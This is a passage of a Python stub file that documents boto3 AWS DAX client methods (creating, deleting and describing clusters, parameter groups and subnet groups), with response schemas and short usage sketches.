DAX.Client.exceptions.SubnetGroupNotFoundFault
DAX.Client.exceptions.InvalidParameterGroupStateFault
DAX.Client.exceptions.ParameterGroupNotFoundFault
DAX.Client.exceptions.ClusterQuotaForCustomerExceededFault
DAX.Client.exceptions.NodeQuotaForClusterExceededFault
DAX.Client.exceptions.NodeQuotaForCustomerExceededFault
DAX.Client.exceptions.InvalidVPCNetworkStateFault
DAX.Client.exceptions.TagQuotaPerResourceExceeded
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'Cluster': {
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
}
}
:returns:
(string) --
"""
pass
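# Usage sketch (illustrative, not part of the generated stubs): a minimal
# create_cluster call. The signature is assumed from the AWS DAX API
# (ClusterName, NodeType, ReplicationFactor, and IamRoleArn are required);
# every value below is a placeholder, and boto3 credentials/region are
# assumed to be configured.
def _example_create_cluster():
    import boto3
    dax = boto3.client('dax')
    response = dax.create_cluster(
        ClusterName='my-dax-cluster',
        NodeType='dax.t3.small',
        ReplicationFactor=3,  # one primary node plus two read replicas
        IamRoleArn='arn:aws:iam::123456789012:role/DAXServiceRole'
    )
    return response['Cluster']['Status']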
def create_parameter_group(ParameterGroupName=None, Description=None):
"""
Creates a new parameter group. A parameter group is a collection of parameters that you apply to all of the nodes in a DAX cluster.
See also: AWS API Documentation
Exceptions
:example: response = client.create_parameter_group(
ParameterGroupName='string',
Description='string'
)
:type ParameterGroupName: string
:param ParameterGroupName: [REQUIRED]\nThe name of the parameter group to create. The parameters in this group apply to all of the nodes in a DAX cluster.\n
:type Description: string
:param Description: A description of the parameter group.
:rtype: dict
ReturnsResponse Syntax
{
'ParameterGroup': {
'ParameterGroupName': 'string',
'Description': 'string'
}
}
Response Structure
(dict) --
ParameterGroup (dict) --
Represents the output of a CreateParameterGroup action.
ParameterGroupName (string) --
The name of the parameter group.
Description (string) --
A description of the parameter group.
Exceptions
DAX.Client.exceptions.ParameterGroupQuotaExceededFault
DAX.Client.exceptions.ParameterGroupAlreadyExistsFault
DAX.Client.exceptions.InvalidParameterGroupStateFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'ParameterGroup': {
'ParameterGroupName': 'string',
'Description': 'string'
}
}
:returns:
DAX.Client.exceptions.ParameterGroupQuotaExceededFault
DAX.Client.exceptions.ParameterGroupAlreadyExistsFault
DAX.Client.exceptions.InvalidParameterGroupStateFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
"""
pass
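# Usage sketch (illustrative): creating a parameter group with boto3. The
# group name and description are placeholder assumptions; individual
# parameter values can be tuned afterwards with update_parameter_group.
def _example_create_parameter_group():
    import boto3
    dax = boto3.client('dax')
    response = dax.create_parameter_group(
        ParameterGroupName='my-dax-params',  # placeholder name
        Description='Custom settings for the orders cache'
    )
    return response['ParameterGroup']['ParameterGroupName']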
def create_subnet_group(SubnetGroupName=None, Description=None, SubnetIds=None):
"""
Creates a new subnet group.
See also: AWS API Documentation
Exceptions
:example: response = client.create_subnet_group(
SubnetGroupName='string',
Description='string',
SubnetIds=[
'string',
]
)
:type SubnetGroupName: string
:param SubnetGroupName: [REQUIRED]\nA name for the subnet group. This value is stored as a lowercase string.\n
:type Description: string
:param Description: A description for the subnet group.
:type SubnetIds: list
:param SubnetIds: [REQUIRED]\nA list of VPC subnet IDs for the subnet group.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{
'SubnetGroup': {
'SubnetGroupName': 'string',
'Description': 'string',
'VpcId': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': 'string'
},
]
}
}
Response Structure
(dict) --
SubnetGroup (dict) --
Represents the output of a CreateSubnetGroup operation.
SubnetGroupName (string) --
The name of the subnet group.
Description (string) --
The description of the subnet group.
VpcId (string) --
The Amazon Virtual Private Cloud identifier (VPC ID) of the subnet group.
Subnets (list) --
A list of subnets associated with the subnet group.
(dict) --
Represents the subnet associated with a DAX cluster. This parameter refers to subnets defined in Amazon Virtual Private Cloud (Amazon VPC) and used with DAX.
SubnetIdentifier (string) --
The system-assigned identifier for the subnet.
SubnetAvailabilityZone (string) --
The Availability Zone (AZ) for the subnet.
Exceptions
DAX.Client.exceptions.SubnetGroupAlreadyExistsFault
DAX.Client.exceptions.SubnetGroupQuotaExceededFault
DAX.Client.exceptions.SubnetQuotaExceededFault
DAX.Client.exceptions.InvalidSubnet
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
:return: {
'SubnetGroup': {
'SubnetGroupName': 'string',
'Description': 'string',
'VpcId': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': 'string'
},
]
}
}
:returns:
DAX.Client.exceptions.SubnetGroupAlreadyExistsFault
DAX.Client.exceptions.SubnetGroupQuotaExceededFault
DAX.Client.exceptions.SubnetQuotaExceededFault
DAX.Client.exceptions.InvalidSubnet
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
"""
pass
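# Usage sketch (illustrative): creating a subnet group from two existing VPC
# subnets. The subnet IDs below are placeholders; the call raises
# InvalidSubnet if they do not all belong to the same VPC.
def _example_create_subnet_group():
    import boto3
    dax = boto3.client('dax')
    response = dax.create_subnet_group(
        SubnetGroupName='my-dax-subnets',  # stored as a lowercase string
        Description='Private subnets for the DAX cluster',
        SubnetIds=['subnet-0123456789abcdef0', 'subnet-0fedcba9876543210']
    )
    return response['SubnetGroup']['VpcId']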
def decrease_replication_factor(ClusterName=None, NewReplicationFactor=None, AvailabilityZones=None, NodeIdsToRemove=None):
"""
Removes one or more nodes from a DAX cluster.
See also: AWS API Documentation
Exceptions
:example: response = client.decrease_replication_factor(
ClusterName='string',
NewReplicationFactor=123,
AvailabilityZones=[
'string',
],
NodeIdsToRemove=[
'string',
]
)
:type ClusterName: string
:param ClusterName: [REQUIRED]\nThe name of the DAX cluster from which you want to remove nodes.\n
:type NewReplicationFactor: integer
:param NewReplicationFactor: [REQUIRED]\nThe new number of nodes for the DAX cluster.\n
:type AvailabilityZones: list
:param AvailabilityZones: The Availability Zone(s) from which to remove nodes.\n\n(string) --\n\n
:type NodeIdsToRemove: list
:param NodeIdsToRemove: The unique identifiers of the nodes to be removed from the cluster.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Cluster': {
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
}
}
Response Structure
(dict) --
Cluster (dict) --
A description of the DAX cluster, after you have decreased its replication factor.
ClusterName (string) --
The name of the DAX cluster.
Description (string) --
The description of the cluster.
ClusterArn (string) --
The Amazon Resource Name (ARN) that uniquely identifies the cluster.
TotalNodes (integer) --
The total number of nodes in the cluster.
ActiveNodes (integer) --
The number of nodes in the cluster that are active (i.e., capable of serving requests).
NodeType (string) --
The node type for the nodes in the cluster. (All nodes in a DAX cluster are of the same type.)
Status (string) --
The current status of the cluster.
ClusterDiscoveryEndpoint (dict) --
The configuration endpoint for this DAX cluster, consisting of a DNS name and a port number. Client applications can specify this endpoint, rather than an individual node endpoint, and allow the DAX client software to intelligently route requests and responses to nodes in the DAX cluster.
Address (string) --
The DNS hostname of the endpoint.
Port (integer) --
The port number that applications should use to connect to the endpoint.
NodeIdsToRemove (list) --
A list of nodes to be removed from the cluster.
(string) --
Nodes (list) --
A list of nodes that are currently in the cluster.
(dict) --
Represents an individual node within a DAX cluster.
NodeId (string) --
A system-generated identifier for the node.
Endpoint (dict) --
The endpoint for the node, consisting of a DNS name and a port number. Client applications can connect directly to a node endpoint, if desired (as an alternative to allowing the DAX client software to intelligently route requests and responses to nodes in the DAX cluster).
Address (string) --
The DNS hostname of the endpoint.
Port (integer) --
The port number that applications should use to connect to the endpoint.
NodeCreateTime (datetime) --
The date and time (in UNIX epoch format) when the node was launched.
AvailabilityZone (string) --
The Availability Zone (AZ) in which the node has been deployed.
NodeStatus (string) --
The current status of the node. For example: available .
ParameterGroupStatus (string) --
The status of the parameter group associated with this node. For example, in-sync .
PreferredMaintenanceWindow (string) --
A range of time when maintenance of DAX cluster software will be performed. For example: sun:01:00-sun:09:00 . Cluster maintenance normally takes less than 30 minutes, and is performed automatically within the maintenance window.
NotificationConfiguration (dict) --
Describes a notification topic and its status. Notification topics are used for publishing DAX events to subscribers using Amazon Simple Notification Service (SNS).
TopicArn (string) --
The Amazon Resource Name (ARN) that identifies the topic.
TopicStatus (string) --
The current state of the topic.
SubnetGroup (string) --
The subnet group where the DAX cluster is running.
SecurityGroups (list) --
A list of security groups, and the status of each, for the nodes in the cluster.
(dict) --
An individual VPC security group and its status.
SecurityGroupIdentifier (string) --
The unique ID for this security group.
Status (string) --
The status of this security group.
IamRoleArn (string) --
A valid Amazon Resource Name (ARN) that identifies an IAM role. At runtime, DAX will assume this role and use the role\'s permissions to access DynamoDB on your behalf.
ParameterGroup (dict) --
The parameter group being used by nodes in the cluster.
ParameterGroupName (string) --
The name of the parameter group.
ParameterApplyStatus (string) --
The status of parameter updates.
NodeIdsToReboot (list) --
The node IDs of one or more nodes to be rebooted.
(string) --
SSEDescription (dict) --
The description of the server-side encryption status on the specified DAX cluster.
Status (string) --
The current state of server-side encryption:
ENABLING - Server-side encryption is being enabled.
ENABLED - Server-side encryption is enabled.
DISABLING - Server-side encryption is being disabled.
DISABLED - Server-side encryption is disabled.
Exceptions
DAX.Client.exceptions.ClusterNotFoundFault
DAX.Client.exceptions.NodeNotFoundFault
DAX.Client.exceptions.InvalidClusterStateFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'Cluster': {
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
}
}
:returns:
(string) --
"""
pass
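# Usage sketch (illustrative): shrinking a cluster to two nodes. Passing only
# NewReplicationFactor lets DAX choose which nodes to remove; NodeIdsToRemove
# could be supplied instead to target specific nodes. The cluster name is a
# placeholder.
def _example_decrease_replication_factor():
    import boto3
    dax = boto3.client('dax')
    response = dax.decrease_replication_factor(
        ClusterName='my-dax-cluster',
        NewReplicationFactor=2
    )
    # The response lists the node IDs that DAX has scheduled for removal.
    return response['Cluster']['NodeIdsToRemove']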
def delete_cluster(ClusterName=None):
"""
Deletes a previously provisioned DAX cluster. DeleteCluster deletes all associated nodes, node endpoints and the DAX cluster itself. When you receive a successful response from this action, DAX immediately begins deleting the cluster; you cannot cancel or revert this action.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_cluster(
ClusterName='string'
)
:type ClusterName: string
:param ClusterName: [REQUIRED]\nThe name of the cluster to be deleted.\n
:rtype: dict
ReturnsResponse Syntax
{
'Cluster': {
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
}
}
Response Structure
(dict) --
Cluster (dict) --A description of the DAX cluster that is being deleted.
ClusterName (string) --The name of the DAX cluster.
Description (string) --The description of the cluster.
ClusterArn (string) --The Amazon Resource Name (ARN) that uniquely identifies the cluster.
TotalNodes (integer) --The total number of nodes in the cluster.
ActiveNodes (integer) --The number of nodes in the cluster that are active (i.e., capable of serving requests).
NodeType (string) --The node type for the nodes in the cluster. (All nodes in a DAX cluster are of the same type.)
Status (string) --The current status of the cluster.
ClusterDiscoveryEndpoint (dict) --The configuration endpoint for this DAX cluster, consisting of a DNS name and a port number. Client applications can specify this endpoint, rather than an individual node endpoint, and allow the DAX client software to intelligently route requests and responses to nodes in the DAX cluster.
Address (string) --The DNS hostname of the endpoint.
Port (integer) --The port number that applications should use to connect to the endpoint.
NodeIdsToRemove (list) --A list of nodes to be removed from the cluster.
(string) --
Nodes (list) --A list of nodes that are currently in the cluster.
(dict) --Represents an individual node within a DAX cluster.
NodeId (string) --A system-generated identifier for the node.
Endpoint (dict) --The endpoint for the node, consisting of a DNS name and a port number. Client applications can connect directly to a node endpoint, if desired (as an alternative to allowing the DAX client software to intelligently route requests and responses to nodes in the DAX cluster).
Address (string) --The DNS hostname of the endpoint.
Port (integer) --The port number that applications should use to connect to the endpoint.
NodeCreateTime (datetime) --The date and time (in UNIX epoch format) when the node was launched.
AvailabilityZone (string) --The Availability Zone (AZ) in which the node has been deployed.
NodeStatus (string) --The current status of the node. For example: available .
ParameterGroupStatus (string) --The status of the parameter group associated with this node. For example, in-sync .
PreferredMaintenanceWindow (string) --A range of time when maintenance of DAX cluster software will be performed. For example: sun:01:00-sun:09:00 . Cluster maintenance normally takes less than 30 minutes, and is performed automatically within the maintenance window.
NotificationConfiguration (dict) --Describes a notification topic and its status. Notification topics are used for publishing DAX events to subscribers using Amazon Simple Notification Service (SNS).
TopicArn (string) --The Amazon Resource Name (ARN) that identifies the topic.
TopicStatus (string) --The current state of the topic.
SubnetGroup (string) --The subnet group where the DAX cluster is running.
SecurityGroups (list) --A list of security groups, and the status of each, for the nodes in the cluster.
(dict) --An individual VPC security group and its status.
SecurityGroupIdentifier (string) --The unique ID for this security group.
Status (string) --The status of this security group.
IamRoleArn (string) --A valid Amazon Resource Name (ARN) that identifies an IAM role. At runtime, DAX will assume this role and use the role\'s permissions to access DynamoDB on your behalf.
ParameterGroup (dict) --The parameter group being used by nodes in the cluster.
ParameterGroupName (string) --The name of the parameter group.
ParameterApplyStatus (string) --The status of parameter updates.
NodeIdsToReboot (list) --The node IDs of one or more nodes to be rebooted.
(string) --
SSEDescription (dict) --The description of the server-side encryption status on the specified DAX cluster.
Status (string) --The current state of server-side encryption:
ENABLING - Server-side encryption is being enabled.
ENABLED - Server-side encryption is enabled.
DISABLING - Server-side encryption is being disabled.
DISABLED - Server-side encryption is disabled.
Exceptions
DAX.Client.exceptions.ClusterNotFoundFault
DAX.Client.exceptions.InvalidClusterStateFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'Cluster': {
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
}
}
:returns:
(string) --
"""
pass
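# Usage sketch (illustrative): deleting a cluster and tolerating the case
# where it has already been removed. The modeled fault is surfaced through
# the client's exceptions attribute; the cluster name is a placeholder.
def _example_delete_cluster():
    import boto3
    dax = boto3.client('dax')
    try:
        dax.delete_cluster(ClusterName='my-dax-cluster')
    except dax.exceptions.ClusterNotFoundFault:
        pass  # already gone; nothing to do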
def delete_parameter_group(ParameterGroupName=None):
"""
Deletes the specified parameter group. You cannot delete a parameter group if it is associated with any DAX clusters.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_parameter_group(
ParameterGroupName='string'
)
:type ParameterGroupName: string
:param ParameterGroupName: [REQUIRED]\nThe name of the parameter group to delete.\n
:rtype: dict
ReturnsResponse Syntax
{
'DeletionMessage': 'string'
}
Response Structure
(dict) --
DeletionMessage (string) --A user-specified message for this action (i.e., a reason for deleting the parameter group).
Exceptions
DAX.Client.exceptions.InvalidParameterGroupStateFault
DAX.Client.exceptions.ParameterGroupNotFoundFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'DeletionMessage': 'string'
}
"""
pass
def delete_subnet_group(SubnetGroupName=None):
"""
Deletes a subnet group.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_subnet_group(
SubnetGroupName='string'
)
:type SubnetGroupName: string
:param SubnetGroupName: [REQUIRED]\nThe name of the subnet group to delete.\n
:rtype: dict
ReturnsResponse Syntax
{
'DeletionMessage': 'string'
}
Response Structure
(dict) --
DeletionMessage (string) --A user-specified message for this action (i.e., a reason for deleting the subnet group).
Exceptions
DAX.Client.exceptions.SubnetGroupInUseFault
DAX.Client.exceptions.SubnetGroupNotFoundFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
:return: {
'DeletionMessage': 'string'
}
"""
pass
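# Usage sketch (illustrative): a subnet group cannot be deleted while a
# cluster still uses it, so SubnetGroupInUseFault is worth handling
# explicitly. The group name is a placeholder.
def _example_delete_subnet_group():
    import boto3
    dax = boto3.client('dax')
    try:
        dax.delete_subnet_group(SubnetGroupName='my-dax-subnets')
    except dax.exceptions.SubnetGroupInUseFault:
        print('Delete the clusters in this subnet group first.')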
def describe_clusters(ClusterNames=None, MaxResults=None, NextToken=None):
"""
Returns information about all provisioned DAX clusters if no cluster identifier is specified, or about a specific DAX cluster if a cluster identifier is supplied.
If the cluster is in the CREATING state, only cluster level information will be displayed until all of the nodes are successfully provisioned.
If the cluster is in the DELETING state, only cluster level information will be displayed.
If nodes are currently being added to the DAX cluster, node endpoint information and creation time for the additional nodes will not be displayed until they are completely provisioned. When the DAX cluster state is available , the cluster is ready for use.
If nodes are currently being removed from the DAX cluster, no endpoint information for the removed nodes is displayed.
See also: AWS API Documentation
Exceptions
:example: response = client.describe_clusters(
ClusterNames=[
'string',
],
MaxResults=123,
NextToken='string'
)
:type ClusterNames: list
:param ClusterNames: The names of the DAX clusters being described.\n\n(string) --\n\n
:type MaxResults: integer
:param MaxResults: The maximum number of results to include in the response. If more results exist than the specified MaxResults value, a token is included in the response so that the remaining results can be retrieved.\nThe value for MaxResults must be between 20 and 100.\n
:type NextToken: string
:param NextToken: An optional token returned from a prior request. Use this token for pagination of results from this action. If this parameter is specified, the response includes only results beyond the token, up to the value specified by MaxResults .
:rtype: dict
ReturnsResponse Syntax
{
'NextToken': 'string',
'Clusters': [
{
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
},
]
}
Response Structure
(dict) --
NextToken (string) --
Provides an identifier to allow retrieval of paginated results.
Clusters (list) --
The descriptions of your DAX clusters, in response to a DescribeClusters request.
(dict) --
Contains all of the attributes of a specific DAX cluster.
ClusterName (string) --
The name of the DAX cluster.
Description (string) --
The description of the cluster.
ClusterArn (string) --
The Amazon Resource Name (ARN) that uniquely identifies the cluster.
TotalNodes (integer) --
The total number of nodes in the cluster.
ActiveNodes (integer) --
The number of nodes in the cluster that are active (i.e., capable of serving requests).
NodeType (string) --
The node type for the nodes in the cluster. (All nodes in a DAX cluster are of the same type.)
Status (string) --
The current status of the cluster.
ClusterDiscoveryEndpoint (dict) --
The configuration endpoint for this DAX cluster, consisting of a DNS name and a port number. Client applications can specify this endpoint, rather than an individual node endpoint, and allow the DAX client software to intelligently route requests and responses to nodes in the DAX cluster.
Address (string) --
The DNS hostname of the endpoint.
Port (integer) --
The port number that applications should use to connect to the endpoint.
NodeIdsToRemove (list) --
A list of nodes to be removed from the cluster.
(string) --
Nodes (list) --
A list of nodes that are currently in the cluster.
(dict) --
Represents an individual node within a DAX cluster.
NodeId (string) --
A system-generated identifier for the node.
Endpoint (dict) --
The endpoint for the node, consisting of a DNS name and a port number. Client applications can connect directly to a node endpoint, if desired (as an alternative to allowing the DAX client software to intelligently route requests and responses to nodes in the DAX cluster).
Address (string) --
The DNS hostname of the endpoint.
Port (integer) --
The port number that applications should use to connect to the endpoint.
NodeCreateTime (datetime) --
The date and time (in UNIX epoch format) when the node was launched.
AvailabilityZone (string) --
The Availability Zone (AZ) in which the node has been deployed.
NodeStatus (string) --
The current status of the node. For example: available .
ParameterGroupStatus (string) --
The status of the parameter group associated with this node. For example, in-sync .
PreferredMaintenanceWindow (string) --
A range of time when maintenance of DAX cluster software will be performed. For example: sun:01:00-sun:09:00 . Cluster maintenance normally takes less than 30 minutes, and is performed automatically within the maintenance window.
NotificationConfiguration (dict) --
Describes a notification topic and its status. Notification topics are used for publishing DAX events to subscribers using Amazon Simple Notification Service (SNS).
TopicArn (string) --
The Amazon Resource Name (ARN) that identifies the topic.
TopicStatus (string) --
The current state of the topic.
SubnetGroup (string) --
The subnet group where the DAX cluster is running.
SecurityGroups (list) --
A list of security groups, and the status of each, for the nodes in the cluster.
(dict) --
An individual VPC security group and its status.
SecurityGroupIdentifier (string) --
The unique ID for this security group.
Status (string) --
The status of this security group.
IamRoleArn (string) --
A valid Amazon Resource Name (ARN) that identifies an IAM role. At runtime, DAX will assume this role and use the role\'s permissions to access DynamoDB on your behalf.
ParameterGroup (dict) --
The parameter group being used by nodes in the cluster.
ParameterGroupName (string) --
The name of the parameter group.
ParameterApplyStatus (string) --
The status of parameter updates.
NodeIdsToReboot (list) --
The node IDs of one or more nodes to be rebooted.
(string) --
SSEDescription (dict) --
The description of the server-side encryption status on the specified DAX cluster.
Status (string) --
The current state of server-side encryption:
ENABLING - Server-side encryption is being enabled.
ENABLED - Server-side encryption is enabled.
DISABLING - Server-side encryption is being disabled.
DISABLED - Server-side encryption is disabled.
Exceptions
DAX.Client.exceptions.ClusterNotFoundFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'NextToken': 'string',
'Clusters': [
{
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
},
]
}
:returns:
(string) --
"""
pass
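# Usage sketch (illustrative): polling describe_clusters until a newly
# created cluster reaches the 'available' state, at which point the
# discovery endpoint is usable. The cluster name and 30-second poll interval
# are placeholder choices.
def _example_wait_until_available():
    import time
    import boto3
    dax = boto3.client('dax')
    while True:
        response = dax.describe_clusters(ClusterNames=['my-dax-cluster'])
        cluster = response['Clusters'][0]
        if cluster['Status'] == 'available':
            return cluster['ClusterDiscoveryEndpoint']
        time.sleep(30)  # node-level details appear as provisioning completes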
def describe_default_parameters(MaxResults=None, NextToken=None):
"""
Returns the default system parameter information for the DAX caching software.
See also: AWS API Documentation
Exceptions
:example: response = client.describe_default_parameters(
MaxResults=123,
NextToken='string'
)
:type MaxResults: integer
:param MaxResults: The maximum number of results to include in the response. If more results exist than the specified MaxResults value, a token is included in the response so that the remaining results can be retrieved.\nThe value for MaxResults must be between 20 and 100.\n
:type NextToken: string
:param NextToken: An optional token returned from a prior request. Use this token for pagination of results from this action. If this parameter is specified, the response includes only results beyond the token, up to the value specified by MaxResults .
:rtype: dict
ReturnsResponse Syntax
{
'NextToken': 'string',
'Parameters': [
{
'ParameterName': 'string',
'ParameterType': 'DEFAULT'|'NODE_TYPE_SPECIFIC',
'ParameterValue': 'string',
'NodeTypeSpecificValues': [
{
'NodeType': 'string',
'Value': 'string'
},
],
'Description': 'string',
'Source': 'string',
'DataType': 'string',
'AllowedValues': 'string',
'IsModifiable': 'TRUE'|'FALSE'|'CONDITIONAL',
'ChangeType': 'IMMEDIATE'|'REQUIRES_REBOOT'
},
]
}
Response Structure
(dict) --
NextToken (string) --
Provides an identifier to allow retrieval of paginated results.
Parameters (list) --
A list of parameters. Each element in the list represents one parameter.
(dict) --
Describes an individual setting that controls some aspect of DAX behavior.
ParameterName (string) --
The name of the parameter.
ParameterType (string) --
Determines whether the parameter can be applied to any nodes, or only nodes of a particular type.
ParameterValue (string) --
The value for the parameter.
NodeTypeSpecificValues (list) --
A list of node types, and specific parameter values for each node.
(dict) --
Represents a parameter value that is applicable to a particular node type.
NodeType (string) --
A node type to which the parameter value applies.
